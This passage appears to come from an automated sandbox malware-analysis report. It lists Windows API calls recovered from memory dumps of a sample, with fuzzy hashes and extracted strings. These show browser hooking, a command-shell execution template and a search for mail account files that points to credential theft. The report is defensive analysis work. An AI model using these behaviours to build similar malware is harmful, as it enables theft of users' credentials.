  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 128
  • API ID: lstrlen$RtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 1738276641-0
  • Opcode ID: aaba7d0a47ca100521561682d36ca88f08b4b9b0e2dd2eccb0d3987922e97ba9
  • Instruction ID: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
  • Opcode Fuzzy Hash: B7C012A4436C87C88CC059470679660D1C55FF6B0001C530BB0542A31D47523AB6758D
  • Instruction Fuzzy Hash: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
APIs
  • lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
  • lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
  • wsprintfW.USER32 ref: 01B3469A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
